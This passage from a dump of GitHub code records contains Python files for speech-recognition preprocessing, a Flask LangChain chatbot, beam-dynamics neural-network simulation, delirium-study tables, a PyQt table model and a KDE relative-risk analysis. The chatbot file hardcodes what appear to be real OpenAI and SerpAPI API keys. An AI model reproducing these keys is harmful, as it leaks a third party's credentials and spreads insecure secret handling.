nefarious:\n print(\"\\tTest Failed because node \" + i + \" could not be found!\")\n succeeded = False\n break\n\n t.PrintTree()\n if succeeded:\n print(\"\\tTest passed\")","repo_name":"tylerjohnbecker/htt-viz","sub_path":"src/htt_viz_py/find_test.py","file_name":"find_test.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"19136193337","text":"import torch\nimport torch.nn as nn\nimport torch.utils.data\nimport torchaudio\n\n\nclass TextTransform:\n '''Maps characters to integers and vice versa'''\n def __init__(self):\n char_map_str = '''\n ' 0\n <SPACE> 1\n a 2\n b 3\n c 4\n d 5\n e 6\n f 7\n g 8\n h 9\n i 10\n j 11\n k 12\n l 13\n m 14\n n 15\n o 16\n p 17\n q 18\n r 19\n s 20\n t 21\n u 22\n v 23\n w 24\n x 25\n y 26\n z 27\n '''\n self.char_map = {}\n self.index_map = {}\n for line in char_map_str.strip().split('\\n'):\n ch, index = line.split()\n self.char_map[ch] = int(index)\n self.index_map[int(index)] = ch\n self.index_map[1] = ' '\n\n def text_to_int(self, text):\n ''' Use a character map and convert text to an integer sequence '''\n int_sequence = []\n for c in text:\n if c == ' ':\n ch = self.char_map['<SPACE>']\n else:\n ch = self.char_map[c]\n int_sequence.append(ch)\n return int_sequence\n\n def int_to_text(self, labels):\n ''' Use a character map and convert integer labels to an text sequence '''\n string = []\n for i in labels:\n string.append(self.index_map[i])\n return ''.join(string).replace('', ' ')\n\n\n\n# TODO: Questions: Log Mel Spectrogram vs Mel Spectrogram\nclass LogMelSpectogram(nn.Module):\n # TODO: Understand the parameters\n def __init__(self, sample_rate=8000, n_mels=81, win_length=160, hop_length=80):\n super(LogMelSpectogram, self).__init__()\n self.mel_spectrogram = torchaudio.transforms.MelSpectrogram(sample_rate=sample_rate, n_mels=n_mels, win_length=win_length, hop_length=hop_length)\n\n def forward(self, waveform):\n mel_spectrogram = self.mel_spectrogram(waveform)\n # Add 1e-6 to avoid taking log of zero\n log_mel_spectrogram = torch.log(mel_spectrogram + 1e-9)\n return log_mel_spectrogram\n\n\n\nclass PreprocessData(torch.utils.data.Dataset):\n def __init__(self, dataset, validation_set, sample_rate=8000, n_mels=81, win_length=160, hop_length=80):\n super(PreprocessData).__init__()\n self.dataset = dataset\n self.text_transform = TextTransform()\n if validation_set:\n self.preprocess_audio = LogMelSpectogram(sample_rate=sample_rate, n_mels=n_mels, win_length=win_length, hop_length=hop_length)\n else:\n # TODO: Why no frequency and time masking for validation set?\n self.preprocess_audio = nn.Sequential(\n LogMelSpectogram(sample_rate=sample_rate, n_mels=n_mels, win_length=win_length, hop_length=hop_length),\n torchaudio.transforms.FrequencyMasking(freq_mask_param=15),\n torchaudio.transforms.TimeMasking(time_mask_param=35)\n )\n\n def __getitem__(self, index):\n # waveform, sample_rate, label, speaker_id, chapter_id, utterance_id\n waveform, _, label, _, _, _ = self.dataset[index]\n\n # Convert waveform to log mel spectrogram\n log_mel_spectrogram = self.preprocess_audio(waveform)\n # Get the length of the log mel spectrogram\n log_mel_spectrogram_len = log_mel_spectrogram.shape[0] // 2 # TODO: Why divide by 2?\n\n # Convert label text to integer sequence\n label_in_int = torch.tensor(self.text_transform.text_to_int(label.lower()))\n # Get the length of the label\n label_len = torch.tensor(len(label_in_int))\n\n return log_mel_spectrogram, label_in_int, log_mel_spectrogram_len, label_len\n\n def __len__(self):\n return len(self.dataset)\n","repo_name":"Smit6/speech-recognition","sub_path":"data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"34666561265","text":"from flask import Flask, render_template, request\r\nimport os\r\nfrom langchain.llms import OpenAI\r\nfrom langchain.agents import load_tools, initialize_agent\r\n\r\napp = Flask(__name__)\r\n\r\n# Initialize OpenAI API key\r\nos.environ[\"OPENAI_API_KEY\"] = \"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\"\r\nos.environ[\"SERPAPI_API_KEY\"] = \"58e8fec7ef2550920e610f044a933a58a834fc4ea1713773ffcb59a3d101bbef\"\r\n\r\n# Initialize LLM\r\nllm = OpenAI(temperature=0.9)\r\n\r\n# Load tools\r\ntools = load_tools([\"serpapi\", \"llm-math\"], llm=llm)\r\n\r\n# Initialize agent\r\nagent = initialize_agent(tools, llm, agent=\"zero-shot-react-description\", verbose=True)\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template('index.html')\r\n\r\n@app.route('/chat', methods=['POST'])\r\ndef chat():\r\n user_input = request.form['user_input']\r\n if user_input.lower() in ['exit', 'quit']:\r\n return \"Chatbot: Goodbye!\"\r\n response = agent.run(user_input)\r\n return \"Chatbot: \" + response\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n","repo_name":"shamsdigital/Chatbot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71495362083","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\"\"\"\nimport time, copy, os, sys\nimport numpy as np\nimport scipy.io as sio\nimport matplotlib.pyplot as plt\nimport matlab.engine\n\nfrom models import MLP, HNN, DHNN\nfrom train import train\nfrom data_maker import make_dataset\nfrom utils import matlab_interface, ObjectView, normalize, standardize, integrate_model\nmatlab_eng = matlab_interface()\n\n# plots are shown in the plot pane:\nfrom IPython import get_ipython\nipython = get_ipython()\n\nparent_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(parent_dir)\nif 'windows' in sys.platform:\n bar = '\\\\'\nelse:\n bar = '/'\n\n#%% Model parameters and dataset creation:\ndef model_args(as_dict=False):\n model_dict = {'matlab_engine': matlab_eng,\n 'model': 'FOM',\n 'DoF': {'OutBend'},\n 'gravity': 'GravityOn',\n 'beam_data': 'beam_data_test.xlsx',\n 'disp_progress': 'False',\n 'tspan': [0,10],\n 'timestep': 0.01,\n 'p0span': [0,0],\n 'q0span': [-np.pi/9,np.pi/9],\n 'train_split': 0.7,\n 'normalize': False,\n 'norm_range': [0,1],\n 'standardize': False}\n return model_dict if as_dict else ObjectView(model_dict)\n\n# Dataset:\nmodel_param = model_args()\ndata_raw = make_dataset(model_param, samples=50, train_split=0.5)\nn_DoF, M, I, K, C = data_raw['n_DoF'], data_raw['M'], data_raw['I'], data_raw['K'], data_raw['C']\n\n#%% Preprocessing:\nif model_param.normalize:\n data = normalize(copy.deepcopy(data_raw), model_param.norm_range)\nelif model_param.standardize:\n data = standardize(copy.deepcopy(data_raw))\nelse:\n data = copy.deepcopy(data_raw)\n\n# Train/test split:\nsplit_ix = int(len(data['x'])*model_param.train_split)\nsplit_data = {}\nfor k in ['x', 'dx','t']:\n split_data[k], split_data[k + '_test'] = data[k][:split_ix], data[k][split_ix:]\ndata = split_data\n\n#%% Train NN model:\nif 'dhnn_model' and 'mlp_model' and 'hnn_model' in locals():\n del dhnn_model, mlp_model, hnn_model\n \ndef train_args(as_dict=False):\n train_dict = {'input_dim': 2*n_DoF+1,\n 'hidden_dim': 50, # capacity\n 'output_dim': 2*n_DoF,\n 'learning_rate': 1e-3, \n 'test_every': 1,\n 'print_every': 200,\n 'batch_size': 1001,\n 'total_steps': 10000, # because we have a synthetic dataset\n 'device': 'cpu', # {\"cpu\", \"cuda\"} for using GPUs\n 'seed': 0,\n 'as_separate': False,\n 'decay': 0}\n return train_dict if as_dict else ObjectView(train_dict)\n\nargs = train_args()\nmlp_model = MLP(args.input_dim, args.output_dim, args.hidden_dim)\nmlp_results = train(mlp_model, args, data)\n\n# hnn_model = HNN(args.input_dim, args.hidden_dim)\n# hnn_results = train(hnn_model, args, data)\n\ndhnn_model = DHNN(args.input_dim, args.hidden_dim)\ndhnn_results = train(dhnn_model, args, data)\n\n#%% Test simulation model:\nprint('\\rRunning test simulations... {:.1f}% done'.format(0), end='')\n\n# Test Parameters:\ntspan = [0,15]\ndt = 0.01\ntvec = np.array(np.linspace(tspan[0],tspan[1],int((tspan[1]-tspan[0])/dt)+1))\nkwargs = {'t_eval': tvec, 'rtol': 1e-10}\np0span = model_param.p0span\nq0span = model_param.q0span\nn_test = 1\n\ntsim_mlp, tsim_dhnn, tsim_true, t_mlp_true, t_dhnn_true = [], [], [], [], []\nfor i in range(n_test):\n p0_test = 0*((p0span[1]-p0span[0])*np.random.rand(n_DoF) + p0span[0] )\n q0_test = 0*((q0span[1]-q0span[0])*np.random.rand(n_DoF) + q0span[0])\n X0_test_raw = np.concatenate([p0_test,q0_test])\n\n if model_param.normalize:\n norm_range = model_param.norm_range\n p0_test = np.ptp(norm_range)*(p0_test - np.min(data_raw['x'][:,:n_DoF]))/np.ptp(data_raw['x'][:,:n_DoF]) + norm_range[0] \n q0_test = np.ptp(norm_range)*(q0_test - np.min(data_raw['x'][:,n_DoF:]))/np.ptp(data_raw['x'][:,n_DoF:]) + norm_range[0]\n X0_test = np.concatenate([p0_test,q0_test])\n elif model_param.standardize:\n p0_test = (p0_test - np.mean(data_raw['x'][:,:n_DoF]))/np.std(data_raw['x'][:,:n_DoF]) \n q0_test = (q0_test - np.mean(data_raw['x'][:,n_DoF:]))/np.std(data_raw['x'][:,n_DoF:])\n X0_test = np.concatenate([p0_test,q0_test])\n else:\n X0_test = X0_test_raw \n\n # Run MLP model simulation for the test case\n t = time.time()\n X_mlp = integrate_model(mlp_model, tspan, X0_test, n_DoF, **kwargs) # MLP NN model simulation\n tsim_mlp.append(time.time() - t)\n\n # Run DHNN model simulation for the test case\n t = time.time()\n X_dhnn = integrate_model(dhnn_model, tspan, X0_test, n_DoF, **kwargs) # DHNN model simulation\n tsim_dhnn.append(time.time() - t)\n \n # Run MATLAB simulation for the test case:\n t = time.time()\n X_true = matlab_eng.simulation(model_param.model,model_param.DoF,model_param.gravity,\n matlab.double(tvec),matlab.double(X0_test_raw),\n model_param.disp_progress,nargout=2)[0]\n tsim_true.append(time.time() - t)\n \n t_mlp_true.append((tsim_mlp[i]/tsim_true[i])*100)\n t_dhnn_true.append((tsim_dhnn[i]/tsim_true[i])*100)\n \n progress_msg = '\\rrunning test simulations... {:.1f}% done'.format(100*(i+1)/n_test)\n print(progress_msg + '\\n' if i == n_test-1 else progress_msg, end='')\n \n# Denormalize results (if needed):\nif model_param.normalize:\n X_mlp_norm = X_mlp['y'].T\n p_mlp = (X_mlp_norm[:,:n_DoF] - norm_range[0])*np.ptp(data_raw['x'][:,:n_DoF])/np.ptp(norm_range) + np.min(data_raw['x'][:,:n_DoF])\n q_mlp = (X_mlp_norm[:,n_DoF:] - norm_range[0])*np.ptp(data_raw['x'][:,n_DoF:])/np.ptp(norm_range) + np.min(data_raw['x'][:,n_DoF:])\n X_MLP = np.array(np.concatenate([p_mlp.T,q_mlp.T])).T\n X_dhnn_norm = X_dhnn['y'].T\n p_dhnn = (X_dhnn_norm[:,:n_DoF] - norm_range[0])*np.ptp(data_raw['x'][:,:n_DoF])/np.ptp(norm_range) + np.min(data_raw['x'][:,:n_DoF])\n q_dhnn = (X_dhnn_norm[:,n_DoF:] - norm_range[0])*np.ptp(data_raw['x'][:,n_DoF:])/np.ptp(norm_range) + np.min(data_raw['x'][:,n_DoF:])\n X_DHNN = np.array(np.concatenate([p_dhnn.T,q_dhnn.T])).T\nelif model_param.standardize:\n X_mlp_std = X_mlp['y'].T\n p_mlp = X_mlp_std[:,:n_DoF]*np.std(data_raw['x'][:,:n_DoF]) + np.mean(data_raw['x'][:,:n_DoF])\n q_mlp = X_mlp_std[:,n_DoF:]*np.std(data_raw['x'][:,n_DoF:]) + np.mean(data_raw['x'][:,n_DoF:])\n X_MLP = np.array(np.concatenate([p_mlp.T,q_mlp.T])).T\n X_dhnn_std = X_dhnn['y'].T\n p_dhnn = X_dhnn_std[:,:n_DoF]*np.std(data_raw['x'][:,:n_DoF]) + np.mean(data_raw['x'][:,:n_DoF])\n q_dhnn = X_dhnn_std[:,n_DoF:]*np.std(data_raw['x'][:,n_DoF:]) + np.mean(data_raw['x'][:,n_DoF:])\n X_DHNN = np.array(np.concatenate([p_dhnn.T,q_dhnn.T])).T\nelse:\n X_MLP = X_mlp['y'].T\n X_DHNN = X_dhnn['y'].T\n\nX_true = np.array(X_true)\n\n# Save NN simulation results:\nsio.savemat(parent_dir + bar + \"SimulationFramework\" + bar + \"test_results\" + bar + \"test.mat\", {'X_FOM': X_true, 'X_MLP': X_MLP, 'X_DHNN': X_DHNN, 'tvec': matlab.double(tvec)})\n\n# NN relative computaional cost:\nprint('\\nComputational cost relative to MATLAB simulation:\\nMLP: {:.1f}% +/- {:.2f}% \\nDHNN: {:.1f}% +/- {:.2f}%'.format(np.mean(t_mlp_true),np.std(t_mlp_true),np.mean(t_dhnn_true),np.std(t_dhnn_true)))\n\n\n#%% Phase portrait for last test run:\nipython.magic('matplotlib inline')\ndof = 0 # DoF considered for the phase portrait \np_mlp, q_mlp = np.split(X_MLP, 2, axis=1)\np_dhnn, q_dhnn = np.split(X_DHNN, 2, axis=1)\np_true, q_true = np.split(X_true, 2, axis=1)\n\nfig = plt.figure()\nplt.plot(q_true[:,dof],p_true[:,dof],'k', q_mlp[:,dof],p_mlp[:,dof],'--b', q_dhnn[:,dof],p_dhnn[:,dof],'--r')\nplt.xlabel('q [rad]')\nplt.ylabel('p [kg*rad/s]')\nplt.grid(True)\nplt.legend(['Ground Truth','MLP','DHNN'],loc='upper right')\nplt.show()\n\n\n\n\n#y0 = np.array([0.0,0.0,0.0,0.0,0.0,0.0]) \n# p0 = np.asarray([0])\n# q0 = np.asarray([0])\n# p0 = (p0 - np.min(data_raw['x'][:,:n_DoF]))/np.ptp(data_raw['x'][:,:n_DoF])\n# # q0 = (q0 - np.min(data_raw['x'][:,n_DoF:]))/np.ptp(data_raw['x'][:,n_DoF:])\n# y0 = np.array(np.concatenate([p0,q0])).T\n\n# p_real = (x_sol[:,:n_DoF])*np.ptp(data_raw['x'][:,:n_DoF]) + np.min(data_raw['x'][:,:n_DoF])\n# q_real = (x_sol[:,n_DoF:])*np.ptp(data_raw['x'][:,n_DoF:]) + np.min(data_raw['x'][:,n_DoF:])\n# q_real = (x_sol[:,n_DoF:])\n# xs_sol = np.concatenate((p_real,q_real),axis=1)","repo_name":"borgessv/MultibodyNonlinearBeams","sub_path":"MLP/MAIN.py","file_name":"MAIN.py","file_ext":"py","file_size_in_byte":8419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33003240170","text":"\n# --- loading libraries -------------------------------------------------------\nimport pandas as pd\nimport numpy as np\n# ------------------------------------------------------ loading libraries ----\n\n\n# --- main routine ------------------------------------------------------------\nfiles = [\n 'master_train.pickle',\n 'master_validation.pickle',\n 'master_calibration.pickle',\n 'master_test.pickle'\n]\n\nPATH = '/project/M-ABeICU176709/delirium/data/inputs/master/'\n\ndf = pd.DataFrame()\n\nfor f in files:\n print(f)\n temp = pd.read_pickle(PATH+f, compression='zip')\n\n cols = [\n 'ADMISSION_ID', 'PATIENT_ID',\n 'AGE', 'GENDER_M', 'GENDER_F', 'TYPE_EMERG',\n 'TYPE_NON-S', 'TYPE_ELECT', 'CLASS_TRAUM', 'CLASS_SURGI', 'CLASS_MEDIC',\n 'CLASS_NEURO', 'I105', 'I110', 'I116', 'I118_nc01', 'I177_nc01',\n 'I263_nc01', 'I357_nc01', 'delirium_12h', 'delirium_24h']\n \n temp = temp[cols]\n\n temp.rename(columns={\n 'I105' : 'SOFA',\n 'I110' : 'APACHE2',\n 'I116' : 'APACHE3',\n 'I118_nc01' : 'CRRT',\n 'I177_nc01' : 'IHD',\n 'I263_nc01' : 'IV',\n 'I357_nc01' : 'NIV'},\n inplace=True)\n\n df = pd.concat([df, temp], axis=0, ignore_index=True)\n\ncombined = df.groupby('ADMISSION_ID').mean().reset_index()\ntemp = combined.describe()\ntemp.loc['sum',:] = combined.sum()\ntemp.reset_index(inplace=True)\ntemp.to_pickle('/project/M-ABeICU176709/delirium/data/outputs/results/table_1_general.pickle')\n\n# part II - delirium and LOS\nADMISSION = pd.read_pickle('/project/M-ABeICU176709/ABeICU/data/ADMISSIONS.pickle', compression = 'zip')\nadmission_ids = list(df['ADMISSION_ID'].unique())\ndf = ADMISSION.loc[ADMISSION['ADMISSION_ID'].isin(admission_ids)].reset_index(drop=True)\ndf = df[['ADMISSION_ID', 'ICU_ADMIT_DATETIME', 'ICU_DISCH_DATETIME', 'DELIRIUM_FLAG']]\ndf['delta'] = df.apply(lambda x: (x['ICU_DISCH_DATETIME'] - x['ICU_ADMIT_DATETIME']).total_seconds() / 86400, axis=1)\n\ndf = df.groupby('ADMISSION_ID').mean().reset_index()\ntemp = df.describe()\ntemp.loc['sum',:] = df.sum()\ntemp.reset_index(inplace=True)\n\ntemp.to_pickle('/project/M-ABeICU176709/delirium/data/outputs/results/table_1_p2_general.pickle')\n\n\n\n\n\n# ------------------------------------------------------------ main routine ---\n","repo_name":"data-intelligence-for-health-lab/delirium_prediction","sub_path":"code/results/03_table_general.py","file_name":"03_table_general.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37112360371","text":"from PyQt5.QtCore import QAbstractTableModel, Qt, QSize\nfrom datetime import datetime\n\nclass TableModel(QAbstractTableModel):\n def __init__(self, data, headers=None, parent=None) -> None:\n super().__init__(parent)\n self._data = data\n self._headers = headers\n\n def data(self, index, role):\n if role == Qt.DisplayRole:\n # See below for the nested-list data structure.\n # .row() indexes into the outer list,\n # .column() indexes into the sub-list\n value = self._data[index.row()][index.column()]\n if isinstance(value, datetime):\n return value.isoformat()\n\n if isinstance(value, list):\n return str(value)\n \n return value\n\n def rowCount(self, index=None):\n # The length of the outer list.\n return len(self._data)\n\n def columnCount(self, index=None):\n # The following takes the first sub-list, and returns\n # the length (only works if all rows are an equal length)\n if not self._headers is None:\n return len(self._headers)\n \n if len(self._data) > 0:\n return len(self._data[0])\n \n return 0\n\n def headerData(self, section: int, orientation: Qt.Orientation, role: int=Qt.DisplayRole):\n if orientation == Qt.Horizontal:\n if not self._headers is None:\n if len(self._headers) > section:\n head = self._headers[section]\n\n if isinstance(head, dict):\n if role == Qt.DisplayRole:\n return head.get(\"text\")\n if role == Qt.SizeHintRole:\n if \"width\" in head:\n return head.get(\"width\")\n\n else:\n if role == Qt.DisplayRole:\n return str(head)\n if role == Qt.SizeHintRole:\n return QSize(400, 30)\n\n return str(section + 1)\n\n if orientation == Qt.Vertical:\n if role == Qt.DisplayRole:\n return str(section + 1)\n \n return super().headerData(section, orientation, role)","repo_name":"giesekow/dcomex-tools","sub_path":"dcomex/lib/qtdata.py","file_name":"qtdata.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73747932321","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 24 10:52:35 2019\n\n - Relative Risk v2\n \n - without evaluation functions so it's easier to debug\n \n - Need to run FishersLinearDiscriminant to get the normal and faulty data\n \n \n \n - \n\n@author: thomasdrayton\n\"\"\"\n\n\n\n\nimport os\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.neighbors import KernelDensity\nfrom sklearn.model_selection import StratifiedKFold\nfrom matplotlib import cm\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import KFold\nimport matplotlib.path as mpltPath\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib.lines import Line2D\nimport itertools\nfrom operator import itemgetter\nimport scipy.stats as st\nfrom scipy import interp\nfrom sklearn.metrics import auc\nfrom matplotlib import animation\n\n#%%\n\n# Functions -----------------------------------------------------------------\n\n\ndef findKDEbandwidth(bandwidths , fitting_data, class_type):\n '''\n Bandwidth hyperparameter gridsearch so that the probability density \n function fits the data well. Uses 5 fold cross validation.\n \n Bandwidths is the array of values to try i.e. np.linspace()\n \n class_type is a string: either 'Faulty' or 'Normal'\n '''\n gridS = GridSearchCV(KernelDensity(kernel='gaussian'),\n {'bandwidth': bandwidths},\n cv=KFold(5),\n iid=False,\n n_jobs=-1)\n gridS.fit(fitting_data)\n \n print(class_type,': ',gridS.best_params_)\n return gridS\n \n\n\n\n\ndef kde2D(x, y, bandwidth, x_mesh=[0,1,100j],y_mesh=[0,1,100j], **kwargs): \n \"\"\"\n Build 2D kernel density estimate (KDE).\n https://tinyurl.com/y6goqsve\n \"\"\"\n\n # create grid of sample locations (default: 100x100)\n xx, yy = np.mgrid[x_mesh[0]:x_mesh[1]:x_mesh[2], \n y_mesh[0]:y_mesh[1]:y_mesh[2]] # 100j => 100 points linearly spaced [number of bins]]\n\n xy_sample = np.vstack([yy.ravel(), xx.ravel()]).T\n xy_train = np.vstack([y, x]).T\n\n # Instantiate Kernel \n kde_skl = KernelDensity(bandwidth=bandwidth, **kwargs)\n kde_skl.fit(xy_train)\n\n # score_samples() returns the log-likelihood of the samples\n z = np.exp(kde_skl.score_samples(xy_sample))\n #z = kde_skl.score_samples(xy_sample)\n \n #positions = np.vstack([xx.ravel(), yy.ravel()])\n #values = np.vstack([x, y])\n #kernel = st.gaussian_kde(values)\n #z = np.reshape(kernel(positions).T, xx.shape)\n \n return xx, yy, np.reshape(z, xx.shape)\n\n \n\n\n\n\ndef levelKDE(surface):\n '''\n Anything below 10^(-5) is 10^(-5)\n \n surface is zz_f or zz_n from Kde2D\n '''\n for i,vals in enumerate(surface):\n for ii,val in enumerate(vals):\n if(val <= 10**(-5)):\n surface[i][ii] = 10**(-5)\n return surface\n\n\n\ndef encapsulatingContours(set_of_contours,level):\n '''\n set_of_contours = contSet[lvl] which contSet is the variable that stores\n all the levels where each lvl contains the\n number of contours for that level\n level = lvl \n '''\n cont_num = range(len(set_of_contours[level])) # number of contours -----------\n conts_inside = [] # list for contours within each other This can be a function that takes contSet[lvl] as an input\n for c in itertools.combinations(cont_num,2):\n # check if contours are inside each other\n contour1 = set_of_contours[level][c[0]]\n contour2 = set_of_contours[level][c[1]]\n #print(c)\n path1 = mpltPath.Path(contour1)\n path2 = mpltPath.Path(contour2)\n \n if(path1.contains_path(path2)):\n # path2 is inside path1\n conts_inside.append(c)\n \n elif(path2.contains_path(path1)):\n # path1 is inside path2 and returns conts_inside\n conts_inside.append(c)\n return conts_inside \n\n\n\n\ndef contourPlot(xx,yy,surface,fold_count,data_name,data1=None,data2=None):\n '''\n data that's been used to create KDE'\n data_name is a string of the data that you used \n '''\n fig,ax = plt.subplots(1,1)\n cf = ax.contourf(xx,yy,surface,levels=15,cmap=cm.plasma)\n if(data1.all()!=None):\n ax.scatter(data1[:,0], data1[:,1], marker = 'x', s=70,c='r',linewidth=0.7)\n ax.scatter(data2[:,0], data2[:,1], marker = 'o', s=20,edgecolor='white',linewidth=0.7,facecolor='None')\n fig.colorbar(cf)\n ax.set_title(\"Faulty/Normal Log-likelihood: Fold {0}\".format(fold_count+1))\n \n \n#contourPlot(xx,yy,log_rr,fold_count,'',data1=f_X_train,data2=n_X_train) \n\n # make it so that all plots are shown in a single figure\n\n\ndef surfacePlot(xx,yy,surface,fold_count):\n \n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n #fig,ax = plt.subplots(1,1,subplot_kw={'projection':'3d'})\n cb = ax.plot_surface(xx,yy,surface,antialiased=False,\n cmap=cm.plasma,\n alpha=1)\n ax.set_title(\"Faulty/Normal Log-likelihood: Fold {0}\".format(fold_count+1))\n #fig.colorbar(cb)\n \n for angle in np.linspace(0, 360,600):\n ax.view_init(30, angle)\n #plt.draw()\n plt.pause(.0001)\n\n\n\n\n \n \n#%%\n\n\ndef plotDB( p, n, f, l,pause_time=5):\n '''\n This will give the actual results for each contour that is plotted\n Use this to varify that you're automated results are correct'\n \n - p is the Nx2 array containing the coordinates of the contour to plot\n p = contSet[lvl][contour]\n \n - n is the normal data\n \n - f is the faulty data\n \n - if l == '+' positive levels, l=='-' => negative levels\n '''\n \n \n for i in p:\n \n # create paths ------------------------------------------------\n path = mpltPath.Path(i)\n \n n_in = path.contains_points(n)\n f_in = path.contains_points(f)\n \n # assign points ------------------------------------------------\n \n if(l=='+'):\n tn_fn_colors = []\n for point in f_in: # for each faulty point that's inside contour\n if(point==True): # if faulty point is inside contour\n tn_fn_colors.append('red') # give it colour RED (TN)\n else: # if faulty point is outside contour\n tn_fn_colors.append('blue') # FP (becuase region outside contour is positive/normal)\n \n tp_fp_colours = []\n for point in n_in: # for each normal point that's inside contour\n if(point==True): # if faulty point is inside contour\n tp_fp_colours.append('orange') # normal point inside is FN\n else: # if faulty point is otuside contour \n tp_fp_colours.append('purple') # normal points outside is TP\n print('TN: ',np.sum(f_in))\n print('FN: ',np.sum(n_in))\n print()\n \n # for negative regions where contours define normal \n if(l=='-'):\n tn_fn_colors = [] \n for point in f_in: # for each fautly point that's inside contour\n if(point==True):\n tn_fn_colors.append('red') # faulty point in contour is FP\n else:\n tn_fn_colors.append('blue') # faulty point outside contour is TN\n \n tp_fp_colours = []\n for point in n_in:\n if(point==True):\n tp_fp_colours.append('orange') # normal point inside is TP\n else:\n tp_fp_colours.append('purple') # normal points outside is FN\n print('FP: ',np.sum(f_in))\n print('TP: ',np.sum(n_in))\n print()\n \n # plot DB -------------------------------------------------------\n plt.plot(i[:,0],i[:,1],c='k') # path\n \n plt.scatter(f[:,0],f[:,1],marker='x',s=50,color=tn_fn_colors) # faulty points\n plt.scatter(n[:,0],n[:,1],marker='^',s=30,facecolor=None,edgecolors=tp_fp_colours) # normal points\n \n \n \n \n plt.show()\n plt.pause(pause_time)\n\n \n\n\ndef pointInOrOut(data,set_of_contours,level_idx,in_colour,out_colour):\n '''\n Given datapoints and Contour set with associated level, \n \n Returns boolean array of data points are inside or outside contours\n \n data is np.array [Nx2]\n \n '''\n inside = []\n for i in data: # for each index in faulty data\n \n flag = 0\n \n conts_inside = encapsulatingContours(set_of_contours,level_idx)\n \n # ----------------------------------------------------\n # get boolean array for contours that contain the point\n \n # contours that point is within\n inside_lst = []\n \n # for each point, check if it is inside any of the contours\n for contour_coords in set_of_contours[level_idx]:\n \n path = mpltPath.Path(contour_coords)\n \n # check whether in or out of current contour\n f_in = path.contains_point(i)\n \n # add f_in result to list for comparison later\n if(f_in==True):\n inside_lst.append(in_colour)\n else:\n inside_lst.append(out_colour)\n \n #inside_lst.append(f_in)\n \n # ----------------------------------------------------\n \n # ---------------------------------------------------- \n \n # if f_in_lst is all False => not in a contour\n if(all(i == out_colour for i in inside_lst)):\n inside.append(out_colour)\n flag = 1\n continue # move onto next iteration\n \n # ----------------------------------------------------\n \n # ---------------------------------------------------\n # check if it's inside a contour of another contour => False\n # compare list to see if it's within list - if point is true for same index as second value in tuple in list of ti\n for i in conts_inside:\n for ii in range(len(inside_lst)): # if they are in at the same position\n if((i[1]==ii) and (inside_lst[ii]==in_colour)):\n inside.append(out_colour)\n flag = 1\n # ---------------------------------------------------\n \n # ---------------------------------------------------\n # check to see if it's inside a big contour but not a little one\n if(flag==0):\n inside.append(in_colour)\n # ---------------------------------------------------\n \n return inside\n\n\n\ndef plotCleanDB(set_of_contours, level_idx, faulty_data, normal_data, pos_or_neg,r,c):\n \n '''\n usage: plotCleanDB(contSet,1,f_X_test,n_X_test,'+',0,0)\n '''\n \n fig, ax = plt.subplots(1,2,squeeze=False,figsize=(13,5.5))\n \n # plot all db for the lvl\n for i in set_of_contours[level_idx]:\n ax[r][c].scatter(i[:,0],i[:,1],c='k',s=0.2)\n \n if(pos_or_neg=='+'): # +ve\n \n #faulty and normaal boolean arrays for the data\n faulty_clrs = pointInOrOut(faulty_data,set_of_contours,level_idx,'red','blue')\n normal_clrs = pointInOrOut(normal_data,set_of_contours,level_idx,'orange','purple')\n \n # plot color coded data\n ax[r][c].scatter(faulty_data[:,0], faulty_data[:,1], marker = 'x', s=50,\n c=faulty_clrs,\n linewidth=0.7)\n ax[r][c].scatter(normal_data[:,0], normal_data[:,1],marker = '^',\n facecolor=\"None\",\n s=20,edgecolors= normal_clrs,\n linewidths=0.5)\n \n\n \n else: # -ve\n #faulty and normaal boolean arrays for the data\n faulty_clrs = pointInOrOut(faulty_data,set_of_contours,level_idx,'blue','red') # colors switched\n normal_clrs = pointInOrOut(normal_data,set_of_contours,level_idx,'purple','orange')\n \n # plot color coded data\n ax[r][c].scatter(faulty_data[:,0], faulty_data[:,1], marker = 'x', s=50,\n c=faulty_clrs,\n linewidth=0.7)\n ax[r][c].scatter(normal_data[:,0], normal_data[:,1],marker = '^',\n facecolor=\"None\",\n s=20,edgecolors= normal_clrs,\n linewidths=0.5)\n \n\n \n # legend\n colors = ['red', 'blue']\n markers = [plt.scatter([], [], color=c, linewidth=0.8, marker='x') for c in colors]\n labels = ['TN: {0}'.format(faulty_clrs.count('red')),'FN: {0}'.format(faulty_clrs.count('blue'))]\n \n colors = ['purple', 'orange']\n [markers.append(plt.scatter([],[],marker='^',facecolor='None',s=25,edgecolor=c,linewidths=0.6)) for c in colors]\n labels.append('TP: {0}'.format(normal_clrs.count('purple')))\n labels.append('FP: {0}'.format(normal_clrs.count('orange')))\n \n ax[r][c].legend(markers,labels)\n \n # adjust subplot\n fig.subplots_adjust(left=None, bottom=None, right=None, top=0.8, wspace=None, hspace=None)\n \n #fig.savefig('/Users/thomasdrayton/Desktop/neg_threshold_db.png',format='png',dpi=250)\n \n#plotCleanDB(contSet,1,f_X_test,n_X_test,'+',0,0)\n#plotCleanDB(contSet,99,f_X_test,n_X_test,'-',0,1)\n \n \ndef plotAverageROC(list_of_folds):\n '''\n 